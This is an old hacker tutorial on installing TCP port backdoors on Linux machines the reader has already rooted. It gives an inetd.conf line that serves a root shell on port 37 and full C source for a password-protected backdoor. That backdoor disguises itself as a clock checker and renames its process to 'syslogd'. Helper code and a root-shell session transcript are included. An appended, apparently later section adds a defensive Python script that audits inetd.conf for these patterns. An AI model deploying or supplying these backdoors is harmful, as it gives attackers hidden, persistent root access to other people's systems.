backd00ring - PART I
CHAMPION radigy@geocities.com
Keywords: back doors, hacking, cracking, root

Four years ago, when I saw Linux for the first time, I was wondering about the meaning of the words 'hacking', 'backdooring' and so on. Later I got the meaning, and now I'm writing this stuff about backdoors.

Here I will not talk about how to get root access, making/using exploits or sniffing someone's network. Before you start backdooring you must have root (admin) privileges on the victim's machine (you can find more on how to get root at www.rootshell.com and ftp.technotronic.com). When you have r00t you are the king of the machine, and if you have enough brain you can control the victim forever. For this reason you must make little doors which give you access to the hacked OS even after the admins have found out that they were hacked.

There are a lot of different types of backdoors; here I will explain the TCP/IP port backdoor. The idea is to make one of the less useful ports (like time, discard, chargen) listen for incoming connections, so that when you connect you receive access with r00t ID.

The simple way is to edit /etc/inetd.conf and insert the following line:

------------------------------------------------------
time stream tcp nowait root /bin/sh sh -i
---------------------- cut here ----------------------

Next, you must restart your inetd:

------------------------------------------------------
killall -HUP inetd
---------------------- cut here ----------------------

Now you can try to connect on port 37 (time), and you will receive a root shell.

---
# telnet localhost 37
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
sh: no job control in this shell
sh-2.02# id
id
uid=0(root) gid=0(root)
sh-2.02#
---

This method is very simple and I'm not advising you to use it. My solution for making the port backdoor work for you is to protect the port with a password. Here is a little C program which will be executed if you try to connect on a given port number (in the example, port 37).
The program will print the greeting message /etc/issue and after that will wait for a password (the default password is 'blackbox' with the default salt '6S'). If you type a wrong password the connection is terminated; otherwise you are granted root access.

---------------------------------------------------------------
/* clockchk.c created by CHAMPION */
/* to compile: gcc clockchk.c -o /sbin/clockchk -lnsl -lcrypt -O6 -DCRYPT_PASS */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <crypt.h>

#define password "6Sx0frZdJoPOY"   /* crypt("blackbox", "6S"), see mkpass.c below */
#define salts "6S"

int main(int argc, char *argv[])
{
    int i = 0;
    char *s;

    if (getuid() == 0) {
        /* started as root (i.e. by inetd): overwrite the process name */
        bzero(argv[0], 200);
        strcpy(*argv, "syslogd");
        /* greeting banner, then a silent password prompt */
        system("cat /etc/issue");
        s = crypt(getpass(""), salts);
        if (!strcmp(s, password))
            system("/bin/sh -i");
    } else {
        /* run by a normal user it only pretends to check the clock */
        printf("\nChecking system clock...");
        for (; i < 3; i++)
            sleep(1);
        printf("\nSystem clock is ok.\n");
    }
    return 0;
}
---------------------- cut here ----------------------

After you compile the program with:

gcc clockchk.c -o /sbin/clockchk -lnsl -lcrypt -O6 -DCRYPT_PASS

it will be placed in /sbin. Next insert this line in your /etc/inetd.conf (the service name is 'time' again, so it listens on port 37):

------------------------------------------------------
time stream tcp nowait root /bin/sh sh /sbin/ccheck
---------------------- cut here ----------------------

where /sbin/ccheck is the name of a bash script (type 'man bash' to see why you can't execute bin files directly from /bin/sh :))

------------------------------------------------------
#!/bin/sh
/sbin/clockchk
---------------------- cut here ----------------------

Place this script in /sbin/ccheck, after that do 'killall -HUP inetd', and try to connect to port 37. You will be prompted for the password; type 'blackbox' and that's it.

---:))
# telnet localhost 37
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Welcome to RH Linux 6.0 (i386).
blackbox
sh: no job control in this shell
sh-2.02# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),14(uucp),15(shadow),16(dialout),65534(nogroup)
sh-2.02#
---:))

The password used in clockchk.c is stored encrypted for security reasons; you can use this small program to encrypt your own password:

-------------------------------------------------------
/* mkpass.c created by CHAMPION */
#include <stdio.h>
#include <stdlib.h>
#include <crypt.h>

#define salts "6S"

int main(int argc, char *argv[])
{
    if (argc != 2) {
        printf("\nUse: mkpass your_password\n");
        exit(0);
    }
    /* traditional crypt(3) with the fixed two-character salt */
    printf("\nEncrypted pass: %s\n", crypt(argv[1], salts));
    return 0;
}
/* END */
---------------------- cut here ----------------------

This is my simple solution for using the TCP/IP port backdoor; you can enhance it in your own way. There are also UDP port backdoors, but I will not comment on them here. That's all for now; any comments and suggestions send to: radigy@geocities.com

champion <::>
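The two inetd.conf lines above are exactly what an administrator should be looking for. The following audit script is an added example written for this page, not code from the article or its author: it parses the classic inetd.conf format (service, socket type, protocol, wait/nowait, user, server program, arguments) and flags both variants shown here, a shell spawned directly as root and a shell used as a launcher for a wrapper script such as /sbin/ccheck. The sample inetd.conf embedded in it is constructed for the example; the service and shell name lists are assumptions, not a complete catalogue.

```python
"""Audit inetd.conf entries for the port-backdoor pattern described above.

Added example (not part of the original article). Parses the classic
inetd.conf format and flags entries that match the article's two variants.
"""
import os
import sys

# Services that inetd normally serves itself ("internal"); a real server
# program on these lines is unusual. Assumed list, not exhaustive.
INTERNAL_SERVICES = {"echo", "discard", "daytime", "chargen", "time"}

# Binaries that, when named as the server, hand the client an interactive shell.
SHELLS = {"sh", "bash", "ksh", "csh", "tcsh", "zsh", "dash"}

# Constructed sample file: legitimate services, one internal service, and the
# article's two backdoor variants on the 'time' and 'discard' ports.
SAMPLE_INETD_CONF = """\
# /etc/inetd.conf (constructed sample for the audit example)
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
echo    stream  tcp     nowait  root    internal
time    stream  tcp     nowait  root    /bin/sh sh -i
discard stream  tcp     nowait  root    /bin/sh sh /sbin/ccheck
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
"""


def parse_entry(line):
    """Return a dict for one inetd.conf entry, or None for blanks/comments."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    fields = line.split()
    if len(fields) < 6:
        return None  # too short to be a valid entry; inetd would reject it
    service, sock, proto, wait, user, server = fields[:6]
    return {
        "service": service,
        "socket": sock,
        "proto": proto,
        "wait": wait,
        "user": user,
        "server": server,
        "args": fields[6:],
    }


def findings_for(entry):
    """List the reasons an entry looks like the port backdoor from the text."""
    reasons = []
    server = entry["server"]
    args = entry["args"]

    if server == "internal":
        return reasons  # handled inside inetd; nothing is spawned

    # Variant 1: the server program itself is a shell, e.g. "/bin/sh sh -i".
    if os.path.basename(server) in SHELLS:
        reasons.append("server program is a shell (%s)" % server)
        # Variant 2: the shell only launches another file, e.g.
        # "/bin/sh sh /sbin/ccheck"; that script is the real server.
        for a in args[1:]:  # args[0] is argv[0] of the shell
            if a.startswith("/"):
                reasons.append("shell runs wrapper script %s" % a)

    # A normally-internal service pointing at a real program is suspicious.
    if entry["service"] in INTERNAL_SERVICES:
        reasons.append("service '%s' is normally internal but runs %s"
                       % (entry["service"], server))

    # Root amplifies any of the above; note it only when something else hit.
    if entry["user"] == "root" and reasons:
        reasons.append("runs as root")
    return reasons


def audit(text):
    """Return [(service, [reasons...])] for every suspicious entry in text."""
    results = []
    for raw in text.splitlines():
        entry = parse_entry(raw)
        if entry is None:
            continue
        reasons = findings_for(entry)
        if reasons:
            results.append((entry["service"], reasons))
    return results


if __name__ == "__main__":
    # Usage: python audit_inetd.py [/etc/inetd.conf]; without a path it
    # audits the constructed sample above.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path).read() if path else SAMPLE_INETD_CONF
    for service, reasons in audit(data):
        print("%-8s %s" % (service, "; ".join(reasons)))
```

Because the check reads the configuration that inetd itself loads, it still catches the entry when the running process has renamed itself to "syslogd" in ps output, as clockchk.c does. A follow-up check the file cannot give you is to compare the listening sockets on the host against the services the configuration is supposed to expose.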